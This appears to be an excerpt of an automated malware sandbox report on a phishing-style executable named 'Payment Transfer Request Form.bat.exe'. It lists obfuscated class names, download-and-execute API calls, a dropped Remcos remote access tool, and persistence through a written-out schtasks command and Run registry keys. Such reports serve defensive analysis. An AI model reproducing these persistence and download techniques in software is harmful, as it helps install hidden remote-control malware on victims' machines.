              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, FLqfnnFPJGKibtN3dh.cs | High entropy of concatenated method names: 'Y4E9d0dE85', 'VTA9R2KG8I', 'F0Bsl0GkEh', 'zfnspfJt4p', 'JK99e7nLcY', 'VVo9jcK7ca', 'vJl9XsMxPy', 'WAR9MA0Ipw', 'AG69UpADh6', 'BAl9cfyrKE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, SyMs7Qb8mMgfKRYd3X.cs | High entropy of concatenated method names: 'iKjO69oqYs', 'AoxO1jWUWy', 'gQIxKUeM4B', 'CBFxSoAbnr', 'Vy1xPJ9uO0', 'PvpxwSGM8A', 'oADxET4bue', 'tHBxoSXc4W', 'O04xfCamDu', 'Xnax7yCGZW'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, Q2ZkdhRylKQKsTs4XL.cs | High entropy of concatenated method names: 'yfxQxmyW92', 'idvQO32g4N', 'YW9Q2EEqqh', 'jfVQNkPo1b', 'OWcQCDmMOZ', 'K23QZvnAu5', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, Gj5cxnppjd4ARLaEyxk.cs | High entropy of concatenated method names: 'LDuQRsSvVy', 'oogQzMmo48', 'OtuLlfO3iy', 'TPwLpbxbK9', 'PI9L5iiFdZ', 'iayLA22uod', 'ELfLthwy4n', 'YaTLWHbihm', 'PKbLYuxLOW', 'H2OLiZI623'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, sL1PZb5DGwDeE7Paan.cs | High entropy of concatenated method names: 'AWgTY7PLH', 'g8Kaupa9I', 'Ftn87PLKd', 'P9L1tKRBn', 'vXt4g5tI0', 'gy9b6gOwH', 'bM7NAbVyCE1i2xhafS', 'TsIBUoHnMYi64TXIUB', 'VNxskRIHc', 'XpuQw4aMX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, bjins3pl3hlyMvyiu1I.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aEIQepphlQ', 'mU9Qj58lhs', 'y0NQXRapWc', 'KWiQMOTVDf', 'onLQUsal56', 'bjSQclOrDb', 'I1mQBG5w5x'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, xCTOVurxxaXbvrBFwx.cs | High entropy of concatenated method names: 'vWd2W855I1', 'Wtr2iwe7yR', 'L4k2OKo9UO', 'zDx2NX7akf', 'wKN2ZZGGjH', 'Tc6ODvXyBP', 'IxtOFbROTd', 'zXuOq33Z0J', 'D3HOdSWvLP', 'rvMOglfgR9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, DoUWI7geeo4gsMWcTC.cs | High entropy of concatenated method names: 'siDCriUjgS', 'P8lC0SpHjg', 'V26CKfLBW6', 'eZtCSUnIK3', 'QnpCPvbNJ0', 'RnnCwjWTK4', 'rswCEIcFAU', 'CeZCoHDfxA', 'A8bCf0odHA', 'i2aC72Mua5'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, xWxrRF4bbWaNw9tYx3.cs | High entropy of concatenated method names: 'HI8xabX1ct', 'kqsx8RyJ90', 'k5vxm6bWpF', 'GENx4DXHHV', 'nSmxHs7djY', 'qGuxuTgOBu', 'P1Xx9qYqsw', 'bfNxshgmBc', 'vIqxCjlZi4', 'PKixQCAWNR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, u0rhBJzJNPIkt5N8Be.cs | High entropy of concatenated method names: 'bhQQ8mDI5j', 'mDXQmiOJTZ', 'FykQ4ZLMc9', 'GpGQr6kNDA', 'lVlQ05eThQ', 'hOsQSW2MoQ', 'tjuQPremiu', 'SH7QhBykvY', 'v0pQJC1boc', 'hqBQyrL5Yg'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, k92S0QfWqHPDXLhQIB.cs | High entropy of concatenated method names: 'VwrNJZ6G28', 'u7XNyFGXF2', 'CloNT2tfyQ', 'Yv7NaW5Z1u', 'J4FN6eXIDO', 'iZPN8qy1qo', 'KliN1072L4', 'iDyNmcr39k', 'mJUN4NhVk8', 'xB0NbeIVh9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, E9y7JUBhAG4VZB3dwW.cs | High entropy of concatenated method names: 'Bkh93isiBC', 'K7v9IoVLwH', 'ToString', 'Bqn9YwYoGF', 'ypR9i4n1EN', 'k7P9xJHMQh', 'Q2D9OfBov0', 'gOl92fuDC7', 'X6v9NTI1af', 'wYo9ZYosOt'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, lVPoTvXllLOLRpP1BJ.cs | High entropy of concatenated method names: 'ur8VmQT5b6', 'xDMV4jQbBw', 'ISRVrfb1Ee', 'RXgV0pnskO', 'IgfVSierG5', 'EyJVPcKybC', 'OSZVE3TGQE', 'h4cVoZBpc0', 'pJEV7Dsa7A', 'XRlVesdraM'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, l1OxmNEibSWnLqsK2U.cs | High entropy of concatenated method names: 'W92NYxpbaN', 'mi3NxqIRvs', 'j7UN2buWJe', 'Xc02RaN2jW', 'yv52zGpfA0', 'PgQNlfnKJW', 'YDcNpLDSr0', 'akAN5jJ4qy', 'sagNA3aAM4', 'eOHNtJvDkb'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, vEj6LbpAJ87hLqXMKwF.cs | High entropy of concatenated method names: 'tg6LRpQrDw', 'fc8Lznk3Xi', 'JaDklfHF73', 'BBHtsqdvXsCQ54Nonku', 'UhFyVOdnpJ4W0UGlmxa', 'NkHtCvdzTMPkXm4X1jE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, FrpWtYigKb7lvufHNE.cs | High entropy of concatenated method names: 'Dispose', 'YtVpgIxw1h', 'kkp507IbCL', 'rvIwiJ6Hqw', 'FJEpRNITpX', 'nLTpzaktdc', 'ProcessDialogKey', 'sq15loUWI7', 'Oeo5p4gsMW', 'STC55X2Zkd'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, G8mARHMuZR8FXfnmCS.cs | High entropy of concatenated method names: 'UhjH7mra5i', 'XY6HjYPDkV', 'PF6HMPTPVB', 'PnIHUKZk3P', 'YjHH0melV6', 'WrkHKCle1o', 'sOSHSxE2Ay', 'mn8HPByR6u', 'mnIHwZgHT8', 'BaqHEZJEmm'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, QwhKlmmQbOGs1vhvh6.cs | High entropy of concatenated method names: 'CfliMWOhKg', 'w9UiUDG2tH', 'Ft2icQSo52', 'R2EiBvSMaI', 'JTLiDX0BLW', 'zu2iFCw2ph', 'cERiqd1hWw', 'UeLidOBibZ', 'IrdigGqCk0', 'kaciRRuIsY'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, T5nHuxt62bFgjEPISG.cs | High entropy of concatenated method names: 'IjXpNwhKlm', 'sbOpZGs1vh', 'Vbbp3WaNw9', 'dYxpI3UyMs', 'YYdpH3XJCT', 'hVupuxxaXb', 'WDhyjeDnKZqFw5Nxgb', 'UTyMZYiwrtO9F1etxh', 'VFJppwL6hq', 'JrcpA7tFVX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, ytAJUOq4HRtVIxw1hb.cs | High entropy of concatenated method names: 'mHpCHhDhiK', 'eGAC9eOC0p', 'jXGCCsOrUl', 'SCLCL5Wpq2', 'GgZCnqdJY7', 'PV9ChNAlZb', 'Dispose', 'xEfsY6GYYd', 'LYYsiI6dlC', 'BYBsxtChcR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.cs | High entropy of concatenated method names: 'QIpAWe27sg', 'FuPAYYEfId', 'kNuAi7ECAD', 'LkaAx9juvZ', 'fadAONuKQG', 'jIgA28xoeJ', 'B0qANBD0D2', 'erZAZEhILB', 'oEjAv56Sng', 'QV5A3btiPj'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, FLqfnnFPJGKibtN3dh.cs | High entropy of concatenated method names: 'Y4E9d0dE85', 'VTA9R2KG8I', 'F0Bsl0GkEh', 'zfnspfJt4p', 'JK99e7nLcY', 'VVo9jcK7ca', 'vJl9XsMxPy', 'WAR9MA0Ipw', 'AG69UpADh6', 'BAl9cfyrKE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, SyMs7Qb8mMgfKRYd3X.cs | High entropy of concatenated method names: 'iKjO69oqYs', 'AoxO1jWUWy', 'gQIxKUeM4B', 'CBFxSoAbnr', 'Vy1xPJ9uO0', 'PvpxwSGM8A', 'oADxET4bue', 'tHBxoSXc4W', 'O04xfCamDu', 'Xnax7yCGZW'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, Q2ZkdhRylKQKsTs4XL.cs | High entropy of concatenated method names: 'yfxQxmyW92', 'idvQO32g4N', 'YW9Q2EEqqh', 'jfVQNkPo1b', 'OWcQCDmMOZ', 'K23QZvnAu5', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, Gj5cxnppjd4ARLaEyxk.cs | High entropy of concatenated method names: 'LDuQRsSvVy', 'oogQzMmo48', 'OtuLlfO3iy', 'TPwLpbxbK9', 'PI9L5iiFdZ', 'iayLA22uod', 'ELfLthwy4n', 'YaTLWHbihm', 'PKbLYuxLOW', 'H2OLiZI623'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, sL1PZb5DGwDeE7Paan.cs | High entropy of concatenated method names: 'AWgTY7PLH', 'g8Kaupa9I', 'Ftn87PLKd', 'P9L1tKRBn', 'vXt4g5tI0', 'gy9b6gOwH', 'bM7NAbVyCE1i2xhafS', 'TsIBUoHnMYi64TXIUB', 'VNxskRIHc', 'XpuQw4aMX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, bjins3pl3hlyMvyiu1I.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aEIQepphlQ', 'mU9Qj58lhs', 'y0NQXRapWc', 'KWiQMOTVDf', 'onLQUsal56', 'bjSQclOrDb', 'I1mQBG5w5x'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, xCTOVurxxaXbvrBFwx.cs | High entropy of concatenated method names: 'vWd2W855I1', 'Wtr2iwe7yR', 'L4k2OKo9UO', 'zDx2NX7akf', 'wKN2ZZGGjH', 'Tc6ODvXyBP', 'IxtOFbROTd', 'zXuOq33Z0J', 'D3HOdSWvLP', 'rvMOglfgR9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, DoUWI7geeo4gsMWcTC.cs | High entropy of concatenated method names: 'siDCriUjgS', 'P8lC0SpHjg', 'V26CKfLBW6', 'eZtCSUnIK3', 'QnpCPvbNJ0', 'RnnCwjWTK4', 'rswCEIcFAU', 'CeZCoHDfxA', 'A8bCf0odHA', 'i2aC72Mua5'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, xWxrRF4bbWaNw9tYx3.cs | High entropy of concatenated method names: 'HI8xabX1ct', 'kqsx8RyJ90', 'k5vxm6bWpF', 'GENx4DXHHV', 'nSmxHs7djY', 'qGuxuTgOBu', 'P1Xx9qYqsw', 'bfNxshgmBc', 'vIqxCjlZi4', 'PKixQCAWNR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, u0rhBJzJNPIkt5N8Be.cs | High entropy of concatenated method names: 'bhQQ8mDI5j', 'mDXQmiOJTZ', 'FykQ4ZLMc9', 'GpGQr6kNDA', 'lVlQ05eThQ', 'hOsQSW2MoQ', 'tjuQPremiu', 'SH7QhBykvY', 'v0pQJC1boc', 'hqBQyrL5Yg'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, k92S0QfWqHPDXLhQIB.cs | High entropy of concatenated method names: 'VwrNJZ6G28', 'u7XNyFGXF2', 'CloNT2tfyQ', 'Yv7NaW5Z1u', 'J4FN6eXIDO', 'iZPN8qy1qo', 'KliN1072L4', 'iDyNmcr39k', 'mJUN4NhVk8', 'xB0NbeIVh9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, E9y7JUBhAG4VZB3dwW.cs | High entropy of concatenated method names: 'Bkh93isiBC', 'K7v9IoVLwH', 'ToString', 'Bqn9YwYoGF', 'ypR9i4n1EN', 'k7P9xJHMQh', 'Q2D9OfBov0', 'gOl92fuDC7', 'X6v9NTI1af', 'wYo9ZYosOt'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, lVPoTvXllLOLRpP1BJ.cs | High entropy of concatenated method names: 'ur8VmQT5b6', 'xDMV4jQbBw', 'ISRVrfb1Ee', 'RXgV0pnskO', 'IgfVSierG5', 'EyJVPcKybC', 'OSZVE3TGQE', 'h4cVoZBpc0', 'pJEV7Dsa7A', 'XRlVesdraM'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, l1OxmNEibSWnLqsK2U.cs | High entropy of concatenated method names: 'W92NYxpbaN', 'mi3NxqIRvs', 'j7UN2buWJe', 'Xc02RaN2jW', 'yv52zGpfA0', 'PgQNlfnKJW', 'YDcNpLDSr0', 'akAN5jJ4qy', 'sagNA3aAM4', 'eOHNtJvDkb'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, vEj6LbpAJ87hLqXMKwF.cs | High entropy of concatenated method names: 'tg6LRpQrDw', 'fc8Lznk3Xi', 'JaDklfHF73', 'BBHtsqdvXsCQ54Nonku', 'UhFyVOdnpJ4W0UGlmxa', 'NkHtCvdzTMPkXm4X1jE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, FrpWtYigKb7lvufHNE.cs | High entropy of concatenated method names: 'Dispose', 'YtVpgIxw1h', 'kkp507IbCL', 'rvIwiJ6Hqw', 'FJEpRNITpX', 'nLTpzaktdc', 'ProcessDialogKey', 'sq15loUWI7', 'Oeo5p4gsMW', 'STC55X2Zkd'
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_004063C6 ShellExecuteW,URLDownloadToFileW | 9_2_004063C6
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File created: C:\ProgramData\AppUpdate\remcos.exe
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File created: C:\Users\user\AppData\Roaming\iKgKaogJ.exe
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File created: C:\ProgramData\AppUpdate\remcos.exe

              Boot Survival

              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 9_2_00418A00
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppUpdate
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppUpdate
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AppUpdate
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AppUpdate

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe Code function: 9_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
